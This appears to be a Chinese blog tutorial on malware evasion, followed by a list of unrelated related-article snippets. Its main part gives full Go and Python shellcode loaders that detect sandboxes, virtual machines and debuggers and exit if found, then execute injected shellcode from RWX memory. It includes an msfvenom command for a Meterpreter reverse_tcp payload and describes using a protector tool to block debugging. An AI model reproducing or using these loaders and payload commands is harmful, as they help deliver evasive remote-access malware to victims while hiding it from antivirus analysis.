免杀对抗-反沙盒+反调试
反VT-沙盒检测-Go&Python
介绍:
近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。
其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说沙盒就是为运行中的程序提供的隔离环境。
为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。
go语言
1.使用GoLang打开如下反沙盒go文件。
main.go:会检测电脑配置来判断是否是虚拟环境
packagemainimport("encoding/hex""golang.org/x/sys/windows""os""os/exec""path/filepath""runtime""strings""syscall""time""unsafe")//检测语言,依赖windows数据包,编译后会增加0.6M大小funccheck_language(){a,_:=windows.GetUserPreferredUILanguages(windows.MUI_LANGUAGE_NAME)//获取当前系统首选语言ifa[0]!="zh-CN"{os.Exit(1)}}funccheck_sandbox(){//1.延时运行timeSleep1,_:=timeSleep()//2.检测开机时间bootTime1,_:=bootTime()//3.检测物理内存physicalMemory1,_:=physicalMemory()//4.检测CPU核心数numberOfCPU1,_:=numberOfCPU()//5.检测临时文件数numberOfTempFiles1,_:=numberOfTempFiles()level:=timeSleep1+bootTime1+physicalMemory1+numberOfCPU1+numberOfTempFiles1//有五个等级,等级越趋向于5,越像真机//fmt.Println("level:",level)iflevel<4{os.Exit(1)}}//1.延时运行functimeSleep()(int,error){startTime:=time.Now()time.Sleep(5*time.Second)endTime:=time.Now()sleepTime:=endTime.Sub(startTime)ifsleepTime>=time.Duration(5*time.Second){//fmt.Println("睡眠时间为:",sleepTime)return1,nil}else{return0,nil}}//2.检测开机时间//许多沙箱检测完毕后会重置系统,我们可以检测开机时间来判断是否为真实的运行状况。funcbootTime()(int,error){varkernel=syscall.NewLazyDLL("Kernel32.dll")GetTickCount:=kernel.NewProc("GetTickCount")r,_,_:=GetTickCount.Call()ifr==0{return0,nil}ms:=time.Duration(r*1000*1000)tm:=time.Duration(30*time.Minute)//fmt.Println(ms,tm)ifms<tm{return0,nil}else{return1,nil}}//3、物理内存大小funcphysicalMemory()(int,error){varmod=syscall.NewLazyDLL("kernel32.dll")varproc=mod.NewProc("GetPhysicallyInstalledSystemMemory")varmemuint64proc.Call(uintptr(unsafe.Pointer(&mem)))mem=mem/1048576//fmt.Printf("物理内存为%dG\n",mem)ifmem<4{return0,nil//小于4GB返回0}return1,nil//大于4GB返回1}funcnumberOfCPU()(int,error){a:=runtime.NumCPU()//fmt.Println("CPU核心数为:",a)ifa<4{return0,nil//小于4核心数,返回0}else{return1,nil//大于4核心数,返回1}}funcnumberOfTempFiles()(int,error){conn:=os.Getenv("temp")//通过环境变量读取temp文件夹路径varkintifconn==""{//fmt.Println("未找到temp文件夹,或temp文件夹不存在")return0,nil}else{local_dir:=connerr:=filepath.Walk(local_dir,func(filenamestring,fios.FileInfo,errerror)error{iffi.IsDir(){returnnil}k++//fmt.Println("filename:",filename)//输出文件名字returnnil})//fmt.Println("Temp总共文件数量:",k)iferr!=nil{//fmt.Println("路径获取错误")return0,nil}}ifk<30{return0,nil}return1,nil}funccheck_virtual()(bool,error){//识别虚拟机model:=""varcmd*exec.Cmdcmd=exec.Command("cmd","/C","wmicpathWin32_ComputerSystemgetModel")stdout,err:=cmd.Output()iferr!=nil{returnfalse,err}model=strings.ToLower(string(stdout))ifstrings.Contains(model,"VirtualBox")||strings.Contains(model,"virtual")||strings.Contains(model,"VMware")||strings.Contains(model,"KVM")||strings.Contains(model,"Bochs")||strings.Contains(model,"HVMdomU")||strings.Contains(model,"Parallels"){returntrue,nil//如果是虚拟机则返回true}returnfalse,nil}funcPathExists(pathstring)(bool,error){_,err:=os.Stat(path)iferr==nil{returntrue,nil}ifos.IsNotExist(err){returnfalse,nil}returnfalse,err}funcfack(pathstring){b,_:=PathExists(path)ifb{os.Exit(1)}}funccheck_file(){fack("C:\\windows\\System32\\Drivers\\Vmmouse.sys")fack("C:\\windows\\System32\\Drivers\\vmtray.dll")fack("C:\\windows\\System32\\Drivers\\VMToolsHook.dll")fack("C:\\windows\\System32\\Drivers\\vmmousever.dll")fack("C:\\windows\\System32\\Drivers\\vmhgfs.dll")fack("C:\\windows\\System32\\Drivers\\vmGuestLib.dll")fack("C:\\windows\\System32\\Drivers\\VBoxMouse.sys")fack("C:\\windows\\System32\\Drivers\\VBoxGuest.sys")fack("C:\\windows\\System32\\Drivers\\VBoxSF.sys")fack("C:\\windows\\System32\\Drivers\\VBoxVideo.sys")fack("C:\\windows\\System32\\vboxdisp.dll")fack("C:\\windows\\System32\\vboxhook.dll")fack("C:\\windows\\System32\\vboxoglerrorspu.dll")fack("C:\\windows\\System32\\vboxoglpassthroughspu.dll")fack("C:\\windows\\System32\\vboxservice.exe")fack("C:\\windows\\System32\\vboxtray.exe")fack("C:\\windows\\System32\\VBoxControl.exe")}varVirtualAlloc=syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")funcaaa(aunsafe.Pointer,buintptr,cuint32,dunsafe.Pointer)bool{ret,_,_:=VirtualAlloc.Call(uintptr(a),uintptr(b),uintptr(c),uintptr(d))returnret>0}funcRun(sc[]byte){fly:=func(){}varxxuint32if!aaa(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&fly))),unsafe.Sizeof(uintptr(0)),uint32(0x40),unsafe.Pointer(&xx)){}**(**uintptr)(unsafe.Pointer(&fly))=*(*uintptr)(unsafe.Pointer(&sc))varyyuint32aaa(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&yy))fly()}funcScFromHex(scHexstring)[]byte{varcharcode[]bytecharcode,_=hex.DecodeString(string(scHex))returncharcode}funcmain(){check_language()check_file()check,_:=check_virtual()ifcheck==true{os.Exit(1)}check_sandbox()sccode:=ScFromHex("生成的hex类型shellcode")Run(sccode)}2.启动msf,使用命令生成hex类型shellcode
命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=监听ip LPORT=4444 -f hex
将shellcode写入main.go文件中,运行生成exe程序
3.msf设置监听,在真机运行exe程序,msf成功上线
4.将exe程序放到虚拟机中无法运行,证明代码成功检测出当前处在虚拟环境中。
python语言
1.将如下反沙盒py代码使用py文件打包器打包成exe程序
Vt.py:
import ctypes,base64,os,psutil,timefrom multiprocessing import cpu_countdef check_file():vmfile=['C:\windows\System32\Drivers\Vmmouse.sys','C:\windows\System32\Drivers/vmtray.dll','C:\windows\System32\Drivers\VMToolsHook.dll','C:\windows\System32\Drivers/vmmousever.dll','C:\windows\System32\Drivers/vmhgfs.dll','C:\windows\System32\Drivers/vmGuestLib.dll','C:\windows\System32\Drivers\VBoxMouse.sys','C:\windows\System32\Drivers\VBoxGuest.sys','C:\windows\System32\Drivers\VBoxSF.sys','C:\windows\System32\Drivers\VBoxVideo.sys','C:\windows\System32/vboxdisp.dll','C:\windows\System32/vboxhook.dll','C:\windows\System32/vboxoglerrorspu.dll','C:\windows\System32/vboxoglpassthroughspu.dll','C:\windows\System32/vboxservice.exe','C:\windows\System32/vboxtray.exe','C:\windows\System32\VBoxControl.exe',]for data in vmfile:result=os.path.exists(data)if result:return 0return 1def check_virtual():r=os.popen('wmic path Win32_ComputerSystem get Model')text = r.read()if 'vmware' in text:return 0return 1def numberOfCPU():if int(format(cpu_count())) < 4:return 0return 1def physicalMemory():data = psutil.virtual_memory()total = data.total # 总内存,单位为byten=int(total/1024/1024/1024)+1if n < 4:return 0return 1if __name__ == '__main__':r=numberOfCPU()+physicalMemory()+check_virtual()+check_file()print(r)if r < 4:exit()else:sc=b'生成的shellcode'time.sleep(1)ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(sc), 0x1000, 0x40)time.sleep(1)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(sc), len(sc))time.sleep(1)handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)time.sleep(1)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)time.sleep(1)打包成功
2.真机运行exe程序,cs成功上线
3.将exe程序上传到虚拟机,exe程序无法运行。
反VT反调试-程序保护
1.将上线的exe程序使用ollydbg进行调试,可以正常调试
2.使用工具shielden对exe程序进行保护
下载:https://www.somode.com/softxz/716.html
启动工具,将exe程序拖入工具中。勾选如下选项,点击保护
3.将重新生成的受保护的exe程序再次使用ollydbg调试,可以看到已经不能正常调试了
4.在虚拟机中也无法在运行
相关文章:
免杀对抗-反沙盒+反调试
反VT-沙盒检测-Go&Python 介绍: 近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。 其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说…...
QTimer类的使用方法
本文介绍QTimer类的使用方法。 1.单次触发 在某些情况下,定时器只运行一次,可使用单次触发方式。 QTimer *timer new QTimer(this); connect(timer, &QTimer::timeout, this, &MainWindow::timeout); timer->setSingleShot(true); timer-…...
行为模式:9、空对象模式(Null Object Pattern)(C++示例))
(三)行为模式:9、空对象模式(Null Object Pattern)(C++示例)
目录 1、空对象模式(Null Object Pattern)含义 2、空对象模式的主要涉及以下几个角色 3、空对象模式的应用场景 4、空对象模式的优缺点 (1)优点 (2)缺点 5、C实现空对象模式的实例 1、空对象模式&am…...
Django实战项目-学习任务系统-用户登录
第一步:先创建一个Django应用程序框架代码 1,先创建一个Django项目 django-admin startproject mysite将创建一个目录,其布局如下:mysite/manage.pymysite/__init__.pysettings.pyurls.pyasgi.pywsgi.py 2,再创建一个…...
【动手学深度学习-Pytorch版】Transformer代码总结
本文是纯纯的撸代码讲解,没有任何Transformer的基础内容~ 是从0榨干Transformer代码系列,借用的是李沐老师上课时讲解的代码。 本文是根据每个模块的实现过程来进行讲解的。如果您想获取关于Transformer具体的实现细节(不含代码)可…...
做外贸独立站选Shopify还是WordPress?
现在确实会有很多新人想做独立站,毕竟跨境电商平台内卷严重,平台规则限制不断升级,脱离平台“绑架”布局独立站,才能获得更多流量、订单、塑造品牌价值。然而,在选择建立外贸独立站的过程中,选择适合的建站…...
echarts的bug,在series里写tooltip,不起作用,要在全局先写tooltip:{}才起作用,如果在series里写的不起作用就写到全局里
echarts的bug,在series里写tooltip,不起作用,要在全局先写tooltip:{show:true}才起作用,如果在series里写的不起作用就写到全局里 series里写tooltip不起作用,鼠标悬浮在echarts图表上时不显示提示 你需要…...
jmeter分布式压测
一、什么是压力测试? 压力测试(Stress Test),也称为强度测试、负载测试,属于性能测试的范畴。 压力测试是模拟实际应用的软硬件环境及用户使用过程的系统负荷,长时间或超大负荷地运行被测软件系统ÿ…...
consulmanage部署
一、部署consul 使用yum方式部署consul yum install -y yum-utils yum-config-manager --add-repo https://rpm.releases.hashicorp.com/RHEL/hashicorp.repo yum -y install consul 执行以下命令获取uuid密钥并记录下来 uuidgen 编辑consul配置文件 vi /etc/consul.d/consul.h…...
大数据软件项目的验收流程
大数据软件项目的验收流程是确保项目交付符合预期需求和质量标准的关键步骤。以下是一般的大数据软件项目验收流程,希望对大家有所帮助。北京木奇移动技术有限公司,专业的软件外包开发公司,欢迎交流合作。 1.项目验收计划制定: 在…...
《第一行代码Andorid》阅读笔记-第一章
这篇文章是我自己的《第一行代码Andorid》的阅读笔记,虽然大量参考了别人已经写好的一些笔记和代码但是也有自己的提炼和新的问题在里面,我也会放上参考文章链接。 学习重点 Android系统的四大组件: (1)活动ÿ…...
(VP))
Educational Codeforces Round 146 (Rated for Div. 2)(VP)
写个题解 A. Coins void solve(){ll n, k; cin >> n >> k;bl ok true;if (n &1 && k %2 0) ok false;print(ok ? yes : no); } B. Long Legs void solve(){db x, y; cin >> x >> y;if (x < y) swap(x, y);int t1 ceil(sqrt(x))…...
9.30国庆
消息队列完成进程间通信 #include <myhead.h>#define size sizeof(msg_ds)-sizeof(long) //正文大小//消息结构体 typedef struct {long msgtype; //消息类型char data[1024]; //消息正文 }msg_ds;//创建子线程构造体 void *task1(void *arg) {//创造第二个key值ke…...
java基础-第4章-面向对象(二)
一、static关键字 静态(static)可以修饰属性和方法。 称为静态属性(类属性)、静态方法(类方法)。 静态成员是全类所有对象共享的成员。 在全类中只有一份,不因创建多个对象而产生多份。 不必创…...
flex加 grid 布局笔记
<style> .flex-container { display: flex; height: 100%; /* 设置容器的高度 */ } .wide { display: flex; padding: 10px; border: 1px solid lightgray; text-align: center; justify-content: …...
最高评级!华为云CodeArts Board获信通院软件研发效能度量平台先进级认证
9月26日,华为云CodeArts Board获得了中国信通院《云上软件研发效能度量分级模型》的先进级最高级评估,达到了软件研发效能度量平台评估的通用效能度量能力、组织效能模型、项目效能模型、资源效能模型、个人效能模型、研发效能评价模型、项目管理域、开发…...
图像上传功能实现
一、后端 文件存放在images.path路径下 package com.like.common;import jakarta.servlet.ServletOutputStream; import jakarta.servlet.http.HttpServletResponse; import org.springframework.beans.factory.annotation.Value; import org.springframework.web.bind.annot…...
03_Node.js模块化开发
1 Node.js的基本使用 1.1 NPM nodejs安装完成后,会跟随着自动安装另外一个工具npm。 NPM的全称是Node Package Manager,是一个NodeJS包管理和分发工具,已经成为了非官方的发布Node模块(包)的标准。 2020年3月17日&…...
Nginx支持SNI证书,已经ssl_server_name的使用
整理了一些网上的资料,这里记录一下,供大家参考 什么是SNI? 传统的应用场景中,一台服务器对应一个IP地址,一个域名,使用一张包含了域名信息的证书。随着云计算技术的普及,在云中的虚拟机有了一…...
Hive【Hive(六)窗口函数】
窗口函数(window functions) 概述 定义 窗口函数能够为每行数据划分 一个窗口,然后对窗口范围内的数据进行计算,最后将计算结果返回给该行数据。 语法 窗口函数的语法主要包括 窗口 和 函数 两个部分。其中窗口用于定义计算范围…...
eNSP-Cloud(实现本地电脑与eNSP内设备之间通信)
说明: 想象一下,你正在用eNSP搭建一个虚拟的网络世界,里面有虚拟的路由器、交换机、电脑(PC)等等。这些设备都在你的电脑里面“运行”,它们之间可以互相通信,就像一个封闭的小王国。 但是&#…...
Debian系统简介
目录 Debian系统介绍 Debian版本介绍 Debian软件源介绍 软件包管理工具dpkg dpkg核心指令详解 安装软件包 卸载软件包 查询软件包状态 验证软件包完整性 手动处理依赖关系 dpkg vs apt Debian系统介绍 Debian 和 Ubuntu 都是基于 Debian内核 的 Linux 发行版ÿ…...
【android bluetooth 框架分析 04】【bt-framework 层详解 1】【BluetoothProperties介绍】
1. BluetoothProperties介绍 libsysprop/srcs/android/sysprop/BluetoothProperties.sysprop BluetoothProperties.sysprop 是 Android AOSP 中的一种 系统属性定义文件(System Property Definition File),用于声明和管理 Bluetooth 模块相…...
基于Docker Compose部署Java微服务项目
一. 创建根项目 根项目(父项目)主要用于依赖管理 一些需要注意的点: 打包方式需要为 pom<modules>里需要注册子模块不要引入maven的打包插件,否则打包时会出问题 <?xml version"1.0" encoding"UTF-8…...
Spring Boot+Neo4j知识图谱实战:3步搭建智能关系网络!
一、引言 在数据驱动的背景下,知识图谱凭借其高效的信息组织能力,正逐步成为各行业应用的关键技术。本文聚焦 Spring Boot与Neo4j图数据库的技术结合,探讨知识图谱开发的实现细节,帮助读者掌握该技术栈在实际项目中的落地方法。 …...
Rapidio门铃消息FIFO溢出机制
关于RapidIO门铃消息FIFO的溢出机制及其与中断抖动的关系,以下是深入解析: 门铃FIFO溢出的本质 在RapidIO系统中,门铃消息FIFO是硬件控制器内部的缓冲区,用于临时存储接收到的门铃消息(Doorbell Message)。…...
HashMap中的put方法执行流程(流程图)
1 put操作整体流程 HashMap 的 put 操作是其最核心的功能之一。在 JDK 1.8 及以后版本中,其主要逻辑封装在 putVal 这个内部方法中。整个过程大致如下: 初始判断与哈希计算: 首先,putVal 方法会检查当前的 table(也就…...
JVM虚拟机:内存结构、垃圾回收、性能优化
1、JVM虚拟机的简介 Java 虚拟机(Java Virtual Machine 简称:JVM)是运行所有 Java 程序的抽象计算机,是 Java 语言的运行环境,实现了 Java 程序的跨平台特性。JVM 屏蔽了与具体操作系统平台相关的信息,使得 Java 程序只需生成在 JVM 上运行的目标代码(字节码),就可以…...
【从零学习JVM|第三篇】类的生命周期(高频面试题)
前言: 在Java编程中,类的生命周期是指类从被加载到内存中开始,到被卸载出内存为止的整个过程。了解类的生命周期对于理解Java程序的运行机制以及性能优化非常重要。本文会深入探寻类的生命周期,让读者对此有深刻印象。 目录 …...
站群服务器的应用场景都有哪些?
站群服务器主要是为了多个网站的托管和管理所设计的,可以通过集中管理和高效资源的分配,来支持多个独立的网站同时运行,让每一个网站都可以分配到独立的IP地址,避免出现IP关联的风险,用户还可以通过控制面板进行管理功…...